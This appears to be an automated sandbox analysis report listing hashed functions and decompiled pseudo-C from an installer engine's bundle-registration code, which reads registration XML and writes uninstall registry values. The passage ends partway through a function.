                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000E3E0, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                  • Instruction ID: fd866669d7def1bd0f5e6ff0e7dfab73c60d6fbfd972b9342aebd5a2a836bdfc
                                                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                  • Instruction Fuzzy Hash: 481171B76040C283F680C93DD4B46ABE3DBEBC53E0769837AD1825B65CD222ED419500
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10008400, Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 93263c2f41e7a84bd9f3f1fe17f765076f141bc4a56e9309b850ac5ad24851b2
                                                                                                                                                                  • Instruction ID: 092e627599c260872cf77075b20de26a3c1973105b5310ece606d40c860bec08
                                                                                                                                                                  • Opcode Fuzzy Hash: 93263c2f41e7a84bd9f3f1fe17f765076f141bc4a56e9309b850ac5ad24851b2
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A210E729403374BE361E969DC043623392FBC4389F1A8174DE905BB4AD639AA0387D0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10008350, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 61305255b481cac513ca91d6198e57c4f9bc9d105d2506bd85ce044ab558657f
                                                                                                                                                                  • Instruction ID: 54160e38a87a1394f3f731265ac885514747015bc8d543b46c1dad9edca6ae3a
                                                                                                                                                                  • Opcode Fuzzy Hash: 61305255b481cac513ca91d6198e57c4f9bc9d105d2506bd85ce044ab558657f
                                                                                                                                                                  • Instruction Fuzzy Hash: 04110232A50B264EE311D97DCC90773B3D2FBC1699F5A8528EAD28330DE939AB008310
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019E40, Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: fcb5b8d722a8140dbf32dbae953001c1121db2f258d5d916192a685ee3fa6d34
                                                                                                                                                                  • Instruction ID: 400514f795efa1174e6a2b3ff4f6cc3dc550215f7dc1e9ae67a216db31666afb
                                                                                                                                                                  • Opcode Fuzzy Hash: fcb5b8d722a8140dbf32dbae953001c1121db2f258d5d916192a685ee3fa6d34
                                                                                                                                                                  • Instruction Fuzzy Hash: 65D0A93291620CEFC700CF94C902B8EB3F8E700340F1040A8E80487200D2399F10DA81
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019F30, Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 68cc0d9f7c837baba5d84efb1518d219cd5a9d155d3a346d5a5021a63293fcbc
                                                                                                                                                                  • Instruction ID: afa243e2bbc7d5b73eef9c76600441106c915adb5c9f305da66005335667999b
                                                                                                                                                                  • Opcode Fuzzy Hash: 68cc0d9f7c837baba5d84efb1518d219cd5a9d155d3a346d5a5021a63293fcbc
                                                                                                                                                                  • Instruction Fuzzy Hash: FCD0A92059D2CC6ECB02CBB88411BA9BFF88716600F0802C4E888C3382C02A820983A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A79F, Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 444COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0040A79F(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				short* _v16;
				void* _v20;
				void* _t88;
				int _t158;
				void* _t164;
				signed int _t166;
				intOrPtr* _t167;
				intOrPtr* _t168;
				intOrPtr* _t169;
				void* _t174;
				intOrPtr _t176;
				void* _t179;
				void* _t188;
				void* _t190;

				_t174 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				_t88 = E00436045(_a8, L"Registration",  &_v12);
				_t164 = 0x80070490;
				_t179 =  ==  ? 0x80070490 : _t88;
				if(_t179 >= 0) {
					_push(__edi);
					_t176 = _a4;
					if(E00435B5E(_v12, L"Id", _t176 + 0xc) >= 0) {
						if(E00435B5E(_v12, L"Tag", _t176 + 0x10) >= 0) {
							if(E00409A34(_t176, _t176, _a8) >= 0) {
								if(E00435B5E(_v12, L"Version",  &_v16) >= 0) {
									if(E0043720F(_t174, _v16, 0, _t176 + 0x38) >= 0) {
										if(E00435B5E(_v12, L"ProviderKey", _t176 + 0x44) >= 0) {
											if(E00435B5E(_v12, L"ExecutableName", _t176 + 0x48) >= 0) {
												if(E00435D6C(_t166, _v12, L"PerMachine", _t176) >= 0) {
													_t188 = E00436045(_v12, L"Arp",  &_v8);
													if(_t188 == 1) {
														L71:
														if(E00409CAE(_v12, _t176 + 0x94, _t176 + 0x98) >= 0) {
															_t190 = E00436045(_v12, L"Update",  &_v20);
															if(_t190 == 1) {
																L88:
																_t190 = E0040A040(_t166, _t176);
																if(_t190 >= 0) {
																	L91:
																	L92:
																	_t167 = _v12;
																	if(_t167 != 0) {
																		 *((intOrPtr*)( *_t167 + 8))(_t167);
																	}
																	_t168 = _v8;
																	if(_t168 != 0) {
																		 *((intOrPtr*)( *_t168 + 8))(_t168);
																	}
																	_t169 = _v20;
																	if(_t169 != 0) {
																		 *((intOrPtr*)( *_t169 + 8))(_t169);
																	}
																	if(_v16 != 0) {
																		E004380AB(_v16);
																	}
																	return _t190;
																}
																_push("Failed to set registration paths.");
																L90:
																_push(_t190);
																E00430A57();
																goto L91;
															}
															if(_t190 >= 0) {
																 *((intOrPtr*)(_t176 + 0x9c)) = 1;
																_t190 = E00435B5E(_v20, L"Manufacturer", _t176 + 0xa0);
																if(_t190 >= 0) {
																	_t190 = E00435B5E(_v20, L"Department", _t176 + 0xa4);
																	if(_t190 == _t164 || _t190 >= 0) {
																		_t190 = E00435B5E(_v20, L"ProductFamily", _t176 + 0xa8);
																		if(_t190 == _t164 || _t190 >= 0) {
																			_t190 = E00435B5E(_v20, L"Name", _t176 + 0xac);
																			if(_t190 >= 0) {
																				_t190 = E00435B5E(_v20, L"Classification", _t176 + 0xb0);
																				if(_t190 >= 0) {
																					goto L88;
																				}
																				_push("Failed to get @Classification.");
																				goto L90;
																			}
																			_push("Failed to get @Name.");
																		} else {
																			_push("Failed to get @ProductFamily.");
																		}
																	} else {
																		_push("Failed to get @Department.");
																	}
																	goto L90;
																}
																_push("Failed to get @Manufacturer.");
																goto L90;
															}
															_push("Failed to select Update node.");
															goto L90;
														}
														_push("Failed to parse software tag.");
														goto L90;
													}
													if(_t188 >= 0) {
														_t190 = E00435D6C(_t166, _v8, L"Register", _t176 + 4);
														if(_t190 >= 0) {
															_t190 = E00435B5E(_v8, L"DisplayName", _t176 + 0x60);
															if(_t190 == 0x80070490 || _t190 >= 0) {
																_t190 = E00435B5E(_v8, L"DisplayVersion", _t176 + 0x64);
																if(_t190 == _t164 || _t190 >= 0) {
																	_t190 = E00435B5E(_v8, L"Publisher", _t176 + 0x68);
																	if(_t190 == _t164 || _t190 >= 0) {
																		_t190 = E00435B5E(_v8, L"HelpLink", _t176 + 0x6c);
																		if(_t190 == _t164 || _t190 >= 0) {
																			_t190 = E00435B5E(_v8, L"HelpTelephone", _t176 + 0x70);
																			if(_t190 == _t164 || _t190 >= 0) {
																				_t190 = E00435B5E(_v8, L"AboutUrl", _t176 + 0x74);
																				if(_t190 == _t164 || _t190 >= 0) {
																					_t190 = E00435B5E(_v8, L"UpdateUrl", _t176 + 0x78);
																					if(_t190 == _t164 || _t190 >= 0) {
																						_t190 = E00435B5E(_v8, L"ParentDisplayName", _t176 + 0x7c);
																						if(_t190 == _t164 || _t190 >= 0) {
																							_t190 = E00435B5E(_v8, L"Comments", _t176 + 0x80);
																							if(_t190 == _t164 || _t190 >= 0) {
																								_t190 = E00435B5E(_v8, L"Contact", _t176 + 0x84);
																								if(_t190 == _t164 || _t190 >= 0) {
																									_t190 = E00435B5E(_v8, L"DisableModify",  &_v16);
																									if(_t190 < 0) {
																										if(_t190 == _t164) {
																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
																											_t190 = 0;
																										}
																										L65:
																										if(_t190 >= 0) {
																											_t190 = E00435D6C(_t166, _v8, L"DisableRemove", _t176 + 0x90);
																											if(_t190 == _t164) {
																												goto L71;
																											}
																											if(_t190 >= 0) {
																												 *(_t176 + 0x8c) = 1;
																												goto L71;
																											}
																											_push("Failed to get @DisableRemove.");
																											goto L90;
																										}
																										_push("Failed to get @DisableModify.");
																										goto L90;
																									}
																									_t158 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"button", 0xffffffff);
																									_t166 = 2;
																									if(_t158 != _t166) {
																										if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"yes", 0xffffffff) != 2) {
																											if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"no", 0xffffffff) != 2) {
																												_t190 = 0x8000ffff;
																												E004300D9(_t160, "registration.cpp", 0xfd, 0x8000ffff);
																												_push(_v16);
																												_push("Invalid modify disabled type: %ls");
																												L62:
																												_push(_t190);
																												E00430A57();
																												goto L91;
																											}
																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
																											L60:
																											_t164 = 0x80070490;
																											goto L65;
																										}
																										 *(_t176 + 0x88) = 1;
																										goto L60;
																									}
																									 *(_t176 + 0x88) = _t166;
																									goto L60;
																								} else {
																									_push("Failed to get @Contact.");
																									goto L90;
																								}
																							} else {
																								_push("Failed to get @Comments.");
																								goto L90;
																							}
																						} else {
																							_push("Failed to get @ParentDisplayName.");
																							goto L90;
																						}
																					} else {
																						_push("Failed to get @UpdateUrl.");
																						goto L90;
																					}
																				} else {
																					_push("Failed to get @AboutUrl.");
																					goto L90;
																				}
																			} else {
																				_push("Failed to get @HelpTelephone.");
																				goto L90;
																			}
																		} else {
																			_push("Failed to get @HelpLink.");
																			goto L90;
																		}
																	} else {
																		_push("Failed to get @Publisher.");
																		goto L90;
																	}
																} else {
																	_push("Failed to get @DisplayVersion.");
																	goto L90;
																}
															} else {
																_push("Failed to get @DisplayName.");
																goto L90;
															}
														}
														_push("Failed to get @Register.");
														goto L90;
													}
													_push("Failed to select ARP node.");
													goto L90;
												}
												_push("Failed to get @PerMachine.");
												goto L90;
											}
											_push("Failed to get @ExecutableName.");
											goto L90;
										}
										_push("Failed to get @ProviderKey.");
										goto L90;
									}
									_push(_v16);
									_push("Failed to parse @Version: %ls");
									goto L62;
								}
								_push("Failed to get @Version.");
								goto L90;
							}
							_push("Failed to parse related bundles");
							goto L90;
						}
						_push("Failed to get @Tag.");
						goto L90;
					}
					_push("Failed to get @Id.");
					goto L90;
				}
				_push("Failed to select registration node.");
				_push(_t179);
				E00430A57();
				goto L92;
			}



















                                                                                                                                                                  0x0040a79f
                                                                                                                                                                  0x0040a7a9
                                                                                                                                                                  0x0040a7ac
                                                                                                                                                                  0x0040a7af
                                                                                                                                                                  0x0040a7b2
                                                                                                                                                                  0x0040a7c1
                                                                                                                                                                  0x0040a7cb
                                                                                                                                                                  0x0040a7d0
                                                                                                                                                                  0x0040a7d5
                                                                                                                                                                  0x0040a7e9
                                                                                                                                                                  0x0040a7ea
                                                                                                                                                                  0x0040a802
                                                                                                                                                                  0x0040a823
                                                                                                                                                                  0x0040a83c
                                                                                                                                                                  0x0040a85d
                                                                                                                                                                  0x0040a87b
                                                                                                                                                                  0x0040a89f
                                                                                                                                                                  0x0040a8c0
                                                                                                                                                                  0x0040a8de
                                                                                                                                                                  0x0040a8fb
                                                                                                                                                                  0x0040a900
                                                                                                                                                                  0x0040abaf
                                                                                                                                                                  0x0040abc9
                                                                                                                                                                  0x0040abe6
                                                                                                                                                                  0x0040abed
                                                                                                                                                                  0x0040acb7
                                                                                                                                                                  0x0040acbd
                                                                                                                                                                  0x0040acc1
                                                                                                                                                                  0x0040acd0
                                                                                                                                                                  0x0040acd1
                                                                                                                                                                  0x0040acd1
                                                                                                                                                                  0x0040acd6
                                                                                                                                                                  0x0040acdb
                                                                                                                                                                  0x0040acdb
                                                                                                                                                                  0x0040acde
                                                                                                                                                                  0x0040ace3
                                                                                                                                                                  0x0040ace8
                                                                                                                                                                  0x0040ace8
                                                                                                                                                                  0x0040aceb
                                                                                                                                                                  0x0040acf0
                                                                                                                                                                  0x0040acf5
                                                                                                                                                                  0x0040acf5
                                                                                                                                                                  0x0040acfc
                                                                                                                                                                  0x0040ad01
                                                                                                                                                                  0x0040ad01
                                                                                                                                                                  0x0040ad0b
                                                                                                                                                                  0x0040ad0b
                                                                                                                                                                  0x0040acc3
                                                                                                                                                                  0x0040acc8
                                                                                                                                                                  0x0040acc8
                                                                                                                                                                  0x0040acc9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040accf
                                                                                                                                                                  0x0040abf5
                                                                                                                                                                  0x0040ac01
                                                                                                                                                                  0x0040ac1b
                                                                                                                                                                  0x0040ac1f
                                                                                                                                                                  0x0040ac3f
                                                                                                                                                                  0x0040ac43
                                                                                                                                                                  0x0040ac64
                                                                                                                                                                  0x0040ac68
                                                                                                                                                                  0x0040ac89
                                                                                                                                                                  0x0040ac8d
                                                                                                                                                                  0x0040acaa
                                                                                                                                                                  0x0040acae
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040acb0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040acb0
                                                                                                                                                                  0x0040ac8f
                                                                                                                                                                  0x0040ac6e
                                                                                                                                                                  0x0040ac6e
                                                                                                                                                                  0x0040ac6e
                                                                                                                                                                  0x0040ac49
                                                                                                                                                                  0x0040ac49
                                                                                                                                                                  0x0040ac49
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ac43
                                                                                                                                                                  0x0040ac21
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ac21
                                                                                                                                                                  0x0040abf7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040abf7
                                                                                                                                                                  0x0040abcb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040abcb
                                                                                                                                                                  0x0040a908
                                                                                                                                                                  0x0040a925
                                                                                                                                                                  0x0040a929
                                                                                                                                                                  0x0040a946
                                                                                                                                                                  0x0040a94a
                                                                                                                                                                  0x0040a96b
                                                                                                                                                                  0x0040a96f
                                                                                                                                                                  0x0040a990
                                                                                                                                                                  0x0040a994
                                                                                                                                                                  0x0040a9b5
                                                                                                                                                                  0x0040a9b9
                                                                                                                                                                  0x0040a9da
                                                                                                                                                                  0x0040a9de
                                                                                                                                                                  0x0040a9ff
                                                                                                                                                                  0x0040aa03
                                                                                                                                                                  0x0040aa24
                                                                                                                                                                  0x0040aa28
                                                                                                                                                                  0x0040aa49
                                                                                                                                                                  0x0040aa4d
                                                                                                                                                                  0x0040aa71
                                                                                                                                                                  0x0040aa75
                                                                                                                                                                  0x0040aa99
                                                                                                                                                                  0x0040aa9d
                                                                                                                                                                  0x0040aabe
                                                                                                                                                                  0x0040aac2
                                                                                                                                                                  0x0040ab64
                                                                                                                                                                  0x0040ab66
                                                                                                                                                                  0x0040ab6d
                                                                                                                                                                  0x0040ab6d
                                                                                                                                                                  0x0040ab6f
                                                                                                                                                                  0x0040ab71
                                                                                                                                                                  0x0040ab91
                                                                                                                                                                  0x0040ab95
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ab99
                                                                                                                                                                  0x0040aba5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aba5
                                                                                                                                                                  0x0040ab9b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ab9b
                                                                                                                                                                  0x0040ab73
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ab73
                                                                                                                                                                  0x0040aade
                                                                                                                                                                  0x0040aae2
                                                                                                                                                                  0x0040aae5
                                                                                                                                                                  0x0040ab04
                                                                                                                                                                  0x0040ab27
                                                                                                                                                                  0x0040ab37
                                                                                                                                                                  0x0040ab47
                                                                                                                                                                  0x0040ab4c
                                                                                                                                                                  0x0040ab4f
                                                                                                                                                                  0x0040ab54
                                                                                                                                                                  0x0040ab54
                                                                                                                                                                  0x0040ab55
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ab5a
                                                                                                                                                                  0x0040ab29
                                                                                                                                                                  0x0040ab30
                                                                                                                                                                  0x0040ab30
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ab30
                                                                                                                                                                  0x0040ab06
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ab06
                                                                                                                                                                  0x0040aae7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aaa3
                                                                                                                                                                  0x0040aaa3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aaa3
                                                                                                                                                                  0x0040aa7b
                                                                                                                                                                  0x0040aa7b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aa7b
                                                                                                                                                                  0x0040aa53
                                                                                                                                                                  0x0040aa53
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aa53
                                                                                                                                                                  0x0040aa2e
                                                                                                                                                                  0x0040aa2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aa2e
                                                                                                                                                                  0x0040aa09
                                                                                                                                                                  0x0040aa09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aa09
                                                                                                                                                                  0x0040a9e4
                                                                                                                                                                  0x0040a9e4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a9e4
                                                                                                                                                                  0x0040a9bf
                                                                                                                                                                  0x0040a9bf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a9bf
                                                                                                                                                                  0x0040a99a
                                                                                                                                                                  0x0040a99a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a99a
                                                                                                                                                                  0x0040a975
                                                                                                                                                                  0x0040a975
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a975
                                                                                                                                                                  0x0040a950
                                                                                                                                                                  0x0040a950
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a950
                                                                                                                                                                  0x0040a94a
                                                                                                                                                                  0x0040a92b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a92b
                                                                                                                                                                  0x0040a90a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a90a
                                                                                                                                                                  0x0040a8e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a8e0
                                                                                                                                                                  0x0040a8c2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a8c2
                                                                                                                                                                  0x0040a8a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a8a1
                                                                                                                                                                  0x0040a87d
                                                                                                                                                                  0x0040a880
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a880
                                                                                                                                                                  0x0040a85f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a85f
                                                                                                                                                                  0x0040a83e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a83e
                                                                                                                                                                  0x0040a825
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a825
                                                                                                                                                                  0x0040a804
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a804
                                                                                                                                                                  0x0040a7d7
                                                                                                                                                                  0x0040a7dc
                                                                                                                                                                  0x0040a7dd
                                                                                                                                                                  0x00000000

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                                                                  • API String ID: 0-2956246334
                                                                                                                                                                  • Opcode ID: 7f119c4d7a78bae91f84678ab1217b10f4eac9558258ceb4dbcdffff1c679630
                                                                                                                                                                  • Instruction ID: 9d56108fd273e98c5b39d667d263fea09f03945684d6d1e09a9ee18e6e1f7c96
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f119c4d7a78bae91f84678ab1217b10f4eac9558258ceb4dbcdffff1c679630
                                                                                                                                                                  • Instruction Fuzzy Hash: D9E1A732A447357BEB21AA608C41F6EB664AB04710F220677FE11B72D0D77DAD315B8E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040AD55, Relevance: 81.0, APIs: 1, Strings: 45, Instructions: 456registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                  			E0040AD55(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int _a28, unsigned int _a32) {
				void* _v8;
				char _v12;
				unsigned int _v16;
				void* __edi;
				unsigned int _t124;
				char* _t125;
				char* _t126;
				signed int _t135;
				char* _t143;
				intOrPtr _t144;
				char* _t146;
				char* _t147;
				intOrPtr _t148;
				signed int _t181;
				unsigned int _t184;
				intOrPtr* _t185;
				char* _t186;
				void* _t187;

				_t185 = _a8;
				_v8 = 0;
				_v12 = 0;
				if((_a20 & 0x00000001) == 0) {
					L3:
					_t186 = E00432129( *((intOrPtr*)(_t185 + 0x4c)),  *((intOrPtr*)(_t185 + 0x50)), 0x20006,  &_v8);
					__eflags = _t186;
					if(_t186 >= 0) {
						__eflags = _a20 & 0x00000002;
						if((_a20 & 0x00000002) == 0) {
							L85:
							__eflags = _a20 & 0x00000004;
							if((_a20 & 0x00000004) == 0) {
								L97:
								__eflags = _a24 - 1;
								if(__eflags != 0) {
									L100:
									_t186 = E0040A0F6(_t177, _t183, __eflags, _t185, _v8, 1, 0);
									__eflags = _t186;
									if(_t186 < 0) {
										_push("Failed to update resume mode.");
										goto L102;
									}
								} else {
									_t186 = E0041F17C(_t177, _t185);
									__eflags = _t186;
									if(__eflags >= 0) {
										goto L100;
									} else {
										_push("Failed to register the bundle dependency key.");
										goto L102;
									}
								}
							} else {
								_t124 = _a32;
								_t177 = (_t124 << 0x00000020 | _a28) >> 0xa;
								_t125 = _t124 >> 0xa;
								__eflags = _t125;
								if(__eflags < 0) {
									goto L97;
								} else {
									if(__eflags > 0) {
										L90:
										_t126 = 0xffffffff;
										if(__eflags <= 0) {
											__eflags = _t177 - _t126;
											if(_t177 <= _t126) {
												goto L92;
											}
										}
										goto L93;
									} else {
										__eflags = _t177;
										if(_t177 <= 0) {
											goto L97;
										} else {
											__eflags = _t125;
											if(__eflags < 0) {
												L92:
												_t126 = _t177;
											} else {
												goto L90;
											}
											L93:
											_t186 = E004329C8(_v8, L"EstimatedSize", _t126);
											__eflags = _t186;
											if(_t186 >= 0) {
												goto L97;
											} else {
												_push(L"EstimatedSize");
												goto L95;
											}
										}
									}
								}
							}
						} else {
							_t186 = E00432A16(_t177, _v8, L"BundleCachePath",  *((intOrPtr*)(_t185 + 0x54)));
							__eflags = _t186;
							if(_t186 >= 0) {
								_t186 = E00432ABE(_v8, L"BundleUpgradeCode",  *((intOrPtr*)(_t185 + 0x1c)),  *((intOrPtr*)(_t185 + 0x20)));
								__eflags = _t186;
								if(_t186 >= 0) {
